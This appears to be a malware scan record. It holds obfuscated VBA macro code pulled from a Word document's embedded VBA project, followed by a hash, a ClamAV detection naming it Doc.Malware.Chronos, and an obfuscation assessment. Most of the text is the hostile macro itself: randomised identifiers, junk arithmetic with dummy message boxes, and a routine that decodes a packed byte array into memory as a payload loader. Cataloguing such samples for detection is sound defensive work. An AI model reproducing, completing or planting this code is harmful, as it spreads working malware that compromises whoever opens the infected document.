Dim WxFLYBy02U As Long, B8sfivEjuTey9 As Long
WxFLYBy02U = 3
B8sfivEjuTey9 = 16
If WxFLYBy02U + B8sfivEjuTey9 > 4 Then
B8sfivEjuTey9 = WxFLYBy02U + 30
Else
MsgBox 62
End If
CloseHandle XhWjSwNKCJuk.LmOxABarcJL5m
Dim TF7M6cC As Long, SNJWwVfa As Long
TF7M6cC = 85
SNJWwVfa = 95
If TF7M6cC + SNJWwVfa > 4 Then
SNJWwVfa = TF7M6cC + 66
Else
MsgBox 53
End If
End Function
Private Sub DUYzbBVT92Ze(A0HyzK8MGUw() As Byte, Yh2AiyQX05ViPIu As Long)
Dim IUR0l998QJs As Long, OnmgRyLz5a As Long, Th992X2Ox As Byte, Du9p As Long, IQR1mfQcJM As Integer, Ob3MxMW0Cy0L As Byte, DARi1SFtnTQz() As Byte, QZfwN5Unh As Integer
Dim F6EVdbG68rvso7 As Long, RvGt5ODmG6 As Byte, OM4m9bkzb As Long, MfISmZSfaJe0xY As Long, YVKqELdZJeok As Long, CwR(0 To 7) As Byte, KzbFMQvWtvNY(0 To 511) As C03eX6D6jmcn, Oj9zBgQOKuc3GY(0 To 255) As Mm8EZ1xGjr
Du9p = 1
Ob3MxMW0Cy0L = A0HyzK8MGUw(Du9p - 1)
Du9p = Du9p + 1
XUcNdRhe2q 4, VarPtr(OM4m9bkzb), VarPtr(A0HyzK8MGUw(Du9p - 1))
Du9p = Du9p + 4
YVKqELdZJeok = OM4m9bkzb
If (OM4m9bkzb = 0) Then Exit Sub
ReDim DARi1SFtnTQz(0 To OM4m9bkzb - 1)
XUcNdRhe2q 2, VarPtr(IQR1mfQcJM), VarPtr(A0HyzK8MGUw(Du9p - 1))
Du9p = Du9p + 2
For IUR0l998QJs = 1 To IQR1mfQcJM
With Oj9zBgQOKuc3GY(A0HyzK8MGUw(Du9p - 1))
Du9p = Du9p + 1
.YpjK = A0HyzK8MGUw(Du9p - 1)
Du9p = Du9p + 1
ReDim .TRNy7MISLyyqY3el(0 To .YpjK - 1)
End With
Next
CwR(0) = 2 ^ 0
CwR(1) = 2 ^ 1
CwR(2) = 2 ^ 2
CwR(3) = 2 ^ 3
CwR(4) = 2 ^ 4
CwR(5) = 2 ^ 5
CwR(6) = 2 ^ 6
CwR(7) = 2 ^ 7
RvGt5ODmG6 = A0HyzK8MGUw(Du9p - 1)
Du9p = Du9p + 1
QZfwN5Unh = 0
For IUR0l998QJs = 0 To 255
With Oj9zBgQOKuc3GY(IUR0l998QJs)
If (.YpjK > 0) Then
For OnmgRyLz5a = 0 To (.YpjK - 1)
If (RvGt5ODmG6 And CwR(QZfwN5Unh)) Then .TRNy7MISLyyqY3el(OnmgRyLz5a) = 1
QZfwN5Unh = QZfwN5Unh + 1
If (QZfwN5Unh = 8) Then
RvGt5ODmG6 = A0HyzK8MGUw(Du9p - 1)
Du9p = Du9p + 1
QZfwN5Unh = 0
End If
Next
End If
End With
Next
If (QZfwN5Unh = 0) Then Du9p = Du9p - 1
MfISmZSfaJe0xY = 1
KzbFMQvWtvNY(0).W5AbpVdDDKhK = -1
KzbFMQvWtvNY(0).EIM = -1
KzbFMQvWtvNY(0).IkzFuKw4WZ = -1
KzbFMQvWtvNY(0).KEIMYcvA = -1
For IUR0l998QJs = 0 To 255
KCzBZWRiVFxy KzbFMQvWtvNY(), MfISmZSfaJe0xY, IUR0l998QJs, Oj9zBgQOKuc3GY(IUR0l998QJs)
Next
OM4m9bkzb = 0
For Du9p = Du9p To Yh2AiyQX05ViPIu
RvGt5ODmG6 = A0HyzK8MGUw(Du9p - 1)
For QZfwN5Unh = 0 To 7
If (RvGt5ODmG6 And CwR(QZfwN5Unh)) Then F6EVdbG68rvso7 = KzbFMQvWtvNY(F6EVdbG68rvso7).EIM Else F6EVdbG68rvso7 = KzbFMQvWtvNY(F6EVdbG68rvso7).W5AbpVdDDKhK
If (KzbFMQvWtvNY(F6EVdbG68rvso7).KEIMYcvA > -1) Then
DARi1SFtnTQz(OM4m9bkzb) = KzbFMQvWtvNY(F6EVdbG68rvso7).KEIMYcvA
OM4m9bkzb = OM4m9bkzb + 1
If (OM4m9bkzb = YVKqELdZJeok) Then GoTo YVKqELdZJeok
F6EVdbG68rvso7 = 0
End If
Next
Next
YVKqELdZJeok:
Th992X2Ox = 0
For IUR0l998QJs = 0 To (OM4m9bkzb - 1)
Th992X2Ox = Th992X2Ox Xor DARi1SFtnTQz(IUR0l998QJs)
Next
ReDim A0HyzK8MGUw(0 To OM4m9bkzb - 1)
XUcNdRhe2q OM4m9bkzb, VarPtr(A0HyzK8MGUw(0)), VarPtr(DARi1SFtnTQz(0))
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 52736 bytes
SHA-256: af3f2a596c73ec94fdf4b9b9efe40a8ccdeeac68911aeaaadabefbfd0e849dd2
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
334 of 592 identifiers look randomly generated (e.g. 'MsmOZAQyd3oyr5EbT8nbQ0f') — consistent with name-mangling obfuscation.